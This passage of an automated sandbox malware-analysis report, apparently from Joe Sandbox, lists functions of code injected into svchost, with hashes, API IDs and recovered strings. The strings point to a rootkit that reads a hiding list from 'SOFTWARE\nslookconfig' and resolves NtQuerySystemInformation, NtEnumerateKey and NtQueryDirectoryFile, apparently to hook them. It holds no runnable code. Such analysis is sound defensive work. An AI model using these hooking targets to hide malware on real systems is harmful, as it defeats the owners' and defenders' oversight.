                            • Opcode Fuzzy Hash: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction Fuzzy Hash: 46D1CC7A249B8C86EB719B15E49079E77A0F788F88F50461AEA8D477A9CF3CC540CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D0ACFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: 84f30b7b8443c3dbdddd981370fe916ebb5c5f4e012e2662316ca4ef8b58849e
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: CAF054B935264887FF4AAB11E440BDC2371AF44F49FC4181D9A1746165DE3CC598C331
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D05FE0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction ID: 610cd98aa1d0c3d958102382bb9d4eea5c2a4571738aa5296080f9f3380827c4
                            • Opcode Fuzzy Hash: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction Fuzzy Hash: 1602FA7625AB8486EB61CB55E49079EB7A0F7C4F88F500419EB8E83BA9DF7CC444CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D1194C Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: 4bd94f8dc5dba92db93e217a06d19c352bbab255eca38efcf870cc392fafb26d
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 3281D17A6926188EF712ABA1C840BED67A8FF44F8CFC44919DF0A53695DB34C442C332
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D06620 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction ID: e8d2703c6cae52ccd9f9e9d9ca7c1f9fd9823a32d2aa56dd6933f8e07a4ce587
                            • Opcode Fuzzy Hash: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction Fuzzy Hash: 4F61DA7A55AA88C6F7619B15E440B5EB7A0F7C8F48F900619FA8D43BA8DB7CC540CF12
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3CE2078 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: 9c4ca6de60cc47f70c32a58e1ef88b2e0ad2f293e7d7aa97627fab645f245e6f
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: D71194366D5A4802F77A3124D477BEDD0506F54B7CFC8462CAB661B2D68A39CDCBE202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D12C78 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 050267ecfea151eb240bd884ce3ab19800f4d3be0a9e195f6699514267cc12ca
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 4B11A73AAD1A480BF7563168E456BED1041AF54B7CFD80E2CBF66167E68A37C8414337
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D09FA8 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: b7a8c72d483ff2acc95db7e83d010dfccae0723c48626c64fea654c7c0738f3f
                            • Instruction ID: ba2f0b5cee4d51f0b964e742dd473071842cafbe87033cd548e4f59c13dc46d7
                            • Opcode Fuzzy Hash: b7a8c72d483ff2acc95db7e83d010dfccae0723c48626c64fea654c7c0738f3f
                            • Instruction Fuzzy Hash: 4D1175B968324D86FB1AE731E500B9D21956F44FA8F844F2C9A25073DEDA3CC8118622
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3CDDD54 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: f6634c41ae03bde2e2864d0cb549cdece98befc63be2613c7651d9fbf390faae
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: 2961A7319C364C82FB679B15A478BED6690AF54F4CF90401DFA2A17794DB34C86F8222
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3CD9A10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.507754448.000001CAF3CD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3CD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3cd0000_svchost.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: 2c85641b1a64a1da1be9ab33fded31c846974fe09f318bf5ac710a5bc287d209
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: 0E4127766C2348C1FB369B018460BFD76A0AB04F9CFD54119FAA9077D5CA38C4ABC302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D116F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: 462985870bfdf1342da8fc51c496a26ba0f051886f3aef4276edea1721e35e3e
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 6D41F276716A4886FB21AF25E4407ED67A4FB88B88F804429EF4D83788EB7CC001C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D0C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 427cc18b25853ee7a199cf75ee2ba1cf8abdff37ec19450f3a5dd67acf58f9c1
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: 13113B3A648B8486E761DB15B48069EB7A4FBC8FC4F94412AEF8D83B19CF38C450CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D09CE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: a00d94acbf7ebcbcfd849c3615465f6c0cb00e36825a4583f04f19683b946d1f
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: 90112876245B8882EB228B15F44079DB7A5FB88F98F984624EF9907B68DF38C551CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D0C7AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: a3528309b1b56a0f4acd01bd21fc3cbe3ffbd88dc1459a03dea56e18f42981c8
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: D8F0B47D24179882F706AB52B440ADD3260AF88FC8FC84829AE0907B19CF38C485C361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001CAF3D0C758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002F.00000002.508165043.000001CAF3D00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CAF3D00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_47_2_1caf3d00000_svchost.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: 99ed183c038f07a0e78c13ce4852a175a5f65e52f6d0a68cb59207a5de2aea1a
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: 3BE065BD28264896FB1B6B51F440ADD3232AF88FC8FC848299A060B255CE38C584C322
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 000001B8BFF41400 Relevance: 47.5, APIs: 18, Strings: 9, Instructions: 240registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: 7aa8b90339ad11b9a3d11ace94312d56e96ba4ecdfe9c8b7944ca494a80b14b6
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 47C15632610B118AE710EF71E9913DE7BB8F788F88F018016DA8967B69DF7AD455C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF43F20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: cfcfdb69c580174a336b7621ea8a573ae88536a7c2ad23099a056eb73ab51e3e
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: FA415931A04B8282FB64AB35F6657DA33A9FB44F84F040029DD4A66B95EF3FC018C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF41ED0 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: c57af3be4dbddc60cac9372473c9671a23a205f75f5a56761055a69f52157214
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: C7E0EC3060170290FA927BBAAF87BD9379D6B49FC8F241024994D973E3EF6A8459D305
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF135D0 Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 110 1b8bff135d0-1b8bff13632 call 1b8bff134b0 * 4 119 1b8bff13638-1b8bff1363b 110->119 120 1b8bff138d2-1b8bff138e6 110->120 119->120 121 1b8bff13641-1b8bff13644 119->121 121->120 122 1b8bff1364a-1b8bff1364d 121->122 122->120 123 1b8bff13653-1b8bff13672 122->123 123->120 125 1b8bff13678-1b8bff13681 123->125 126 1b8bff136a1-1b8bff136b5 125->126 127 1b8bff13683-1b8bff13689 125->127 129 1b8bff1370f-1b8bff13716 126->129 130 1b8bff136b7 126->130 128 1b8bff13690-1b8bff1369f 127->128 128->126 128->128 132 1b8bff137cc-1b8bff137d4 129->132 133 1b8bff1371c-1b8bff13730 129->133 131 1b8bff136c0-1b8bff136df 130->131 134 1b8bff136e1-1b8bff136e7 131->134 135 1b8bff13704-1b8bff1370d 131->135 136 1b8bff137da-1b8bff137f1 132->136 137 1b8bff1389e-1b8bff138ce 132->137 138 1b8bff137c7 133->138 139 1b8bff13736-1b8bff1373b 133->139 140 1b8bff136f0-1b8bff13702 134->140 135->129 135->131 136->137 141 1b8bff137f7 136->141 137->120 138->132 142 1b8bff13740-1b8bff1374e LoadLibraryA 139->142 140->135 140->140 144 1b8bff13800-1b8bff13815 141->144 145 1b8bff137af-1b8bff137b8 142->145 146 1b8bff13750-1b8bff13760 142->146 148 1b8bff1388d-1b8bff13898 144->148 149 1b8bff13817 144->149 145->142 147 1b8bff137ba-1b8bff137c2 145->147 146->145 150 1b8bff13762-1b8bff13768 146->150 147->138 148->137 148->144 153 1b8bff13820-1b8bff13831 149->153 151 1b8bff1376a-1b8bff1378c 150->151 152 1b8bff1378e-1b8bff13798 150->152 154 1b8bff1379e-1b8bff137ad 151->154 152->154 155 1b8bff1383e-1b8bff13842 153->155 156 1b8bff13833-1b8bff1383c 153->156 154->145 154->150 158 1b8bff1384f-1b8bff13853 155->158 159 1b8bff13844-1b8bff1384d 155->159 157 1b8bff1387a-1b8bff1388b 156->157 157->148 157->153 160 1b8bff1386a-1b8bff1386e 158->160 161 1b8bff13855-1b8bff13868 158->161 159->157 160->157 162 1b8bff13870-1b8bff13875 160->162 161->157 162->157
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508827639.000001B8BFF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF10000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff10000_svchost.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: ab77a3e53c36e480a52c6020d070c619eab97f15d0c7f7e71008ffb406637f0e
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: F381467370169087EB559F21D650BEB77A9FB44FA0F058124EE0947388EF3ADA25C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 000001B8BFF4BEC8 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: ae7d0747505b0c317d4bbc2cbab73e77f5ff364b546457f2210d1e22a6337268
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: 46317C36214F8186EB60EF35E9903DE73A8F788B94F540126EA9D53B99EF39C155CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF51000 Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: 549c974a4702cac34c8ca3658ecf33f9df967db3ec95e7d542efce5b3d575890
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: E3D1EF72704B809AE710EB78D6A02DD7BB9F745B88F144216CE8E57B99DF39E01AC740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF41F20 Relevance: 57.9, APIs: 21, Strings: 12, Instructions: 167libraryloaderthreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 163 1b8bff41f20-1b8bff41f2b 164 1b8bff42255-1b8bff42259 163->164 165 1b8bff41f31-1b8bff41f62 call 1b8bff469c0 GetCurrentThread call 1b8bff46ee0 GetModuleHandleA 163->165 170 1b8bff41f64-1b8bff41f7e GetProcAddress 165->170 171 1b8bff41f95 165->171 172 1b8bff41f9c-1b8bff41fac GetModuleHandleA 170->172 173 1b8bff41f80-1b8bff41f93 call 1b8bff45fa0 170->173 171->172 174 1b8bff41fae-1b8bff41fc8 GetProcAddress 172->174 175 1b8bff41fdf 172->175 173->172 177 1b8bff41fca-1b8bff41fdd call 1b8bff45fa0 174->177 178 1b8bff41fe6-1b8bff41ff6 GetModuleHandleA 174->178 175->178 177->178 181 1b8bff41ff8-1b8bff42012 GetProcAddress 178->181 182 1b8bff42029 178->182 184 1b8bff42014-1b8bff42027 call 1b8bff45fa0 181->184 185 1b8bff42030-1b8bff42040 GetModuleHandleA 181->185 182->185 184->185 187 1b8bff42042-1b8bff4205c GetProcAddress 185->187 188 1b8bff42073 185->188 189 1b8bff4207a-1b8bff4208a GetModuleHandleA 187->189 191 1b8bff4205e-1b8bff42071 call 1b8bff45fa0 187->191 188->189 192 1b8bff4208c-1b8bff420a6 GetProcAddress 189->192 193 1b8bff420bd 189->193 191->189 195 1b8bff420a8-1b8bff420bb call 1b8bff45fa0 192->195 196 1b8bff420c4-1b8bff420d4 GetModuleHandleA 192->196 193->196 195->196 199 1b8bff420d6-1b8bff420f0 GetProcAddress 196->199 200 1b8bff42107 196->200 202 1b8bff4210e-1b8bff4211e GetModuleHandleA 199->202 203 1b8bff420f2-1b8bff42105 call 1b8bff45fa0 199->203 200->202 205 1b8bff42120-1b8bff4213a GetProcAddress 202->205 206 1b8bff42151 202->206 203->202 207 1b8bff42158-1b8bff42168 GetModuleHandleA 205->207 209 1b8bff4213c-1b8bff4214f call 1b8bff45fa0 205->209 206->207 211 1b8bff4216a-1b8bff42184 GetProcAddress 207->211 212 1b8bff4219b 207->212 209->207 214 1b8bff42186-1b8bff42199 call 1b8bff45fa0 211->214 215 1b8bff421a2-1b8bff421b2 GetModuleHandleA 211->215 212->215 214->215 217 1b8bff421b4-1b8bff421ce GetProcAddress 215->217 218 1b8bff421e5 215->218 220 1b8bff421ec-1b8bff421fc GetModuleHandleA 217->220 221 1b8bff421d0-1b8bff421e3 call 1b8bff45fa0 217->221 218->220 222 1b8bff421fe-1b8bff42218 GetProcAddress 220->222 223 1b8bff4223b 220->223 221->220 225 1b8bff4221a-1b8bff42236 call 1b8bff45fa0 222->225 226 1b8bff42242-1b8bff4224b 222->226 223->226 229 1b8bff46a30-1b8bff46a3f call 1b8bff46a40 225->229 226->164 226->229
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000031.00000002.508956244.000001B8BFF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B8BFF40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_49_2_1b8bff40000_svchost.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 6d3ca59ef6d23025bc66e82b69caf1ecafca9b061aa98823ff22e798ea37ebef
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: 5491C374602B06A1FE55FB38FAA53E433ACBF44F80FA45426850E623A4EF7AD559C311
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001B8BFF429E0 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 379stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 233 1b8bff429e0-1b8bff42abc call 1b8bff60ca8 236 1b8bff42fa8-1b8bff42fca call 1b8bff483e0 233->236 237 1b8bff42ac2-1b8bff42ac6 233->237 237->236 239 1b8bff42acc-1b8bff42ada 237->239 239->236 241 1b8bff42ae0-1b8bff42b25 call 1b8bff49890 * 3 GetFileType 239->241 248 1b8bff42b27-1b8bff42b2e 241->248 249 1b8bff42b30-1b8bff42b4b GetFinalPathNameByHandleW 241->249 250 1b8bff42b85-1b8bff42b8c lstrcpyW 248->250 251 1b8bff42b4d-1b8bff42b68 call 1b8bff4a610 249->251 252 1b8bff42b92-1b8bff42b96 249->252 250->252 251->252 260 1b8bff42b6a-1b8bff42b7c lstrlenW 251->260 254 1b8bff42dfc-1b8bff42e11 252->254 255 1b8bff42b9c-1b8bff42bb6 call 1b8bff43b00 252->255 257 1b8bff42e15-1b8bff42e1f 254->257 263 1b8bff42bb8-1b8bff42bcd call 1b8bff4a610 255->263 264 1b8bff42bd3-1b8bff42c0c call 1b8bff43b00 lstrcmpiW 255->264 261 1b8bff42e3d-1b8bff42e54 call 1b8bff43b00 257->261 262 1b8bff42e21-1b8bff42e33 257->262 260->252 266 1b8bff42b7e 260->266 274 1b8bff42e56-1b8bff42e6d call 1b8bff4a610 261->274 275 1b8bff42e73-1b8bff42ea8 call 1b8bff43b00 lstrcmpiW 261->275 262->261 263->264 273 1b8bff42cb0-1b8bff42cf8 call 1b8bff60ca8 263->273 276 1b8bff42c0e-1b8bff42c25 lstrcpyW lstrcatW 264->276 277 1b8bff42c27-1b8bff42c30 